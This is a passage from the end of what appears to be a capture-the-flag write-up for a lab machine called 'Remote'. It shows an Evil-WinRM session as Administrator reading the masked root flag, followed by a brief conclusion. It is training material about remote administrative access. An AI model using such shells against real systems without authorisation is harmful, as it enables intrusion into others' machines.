*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
6aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it! We managed to get the root flag.

Conclusion

Here we can see the progress graph :